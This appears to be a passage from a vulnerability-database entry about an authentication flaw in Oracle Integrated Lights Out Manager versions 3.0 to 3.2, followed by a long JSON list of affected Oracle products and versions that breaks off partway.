Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'Multiple' protocol. The 'Authentication' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0652", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 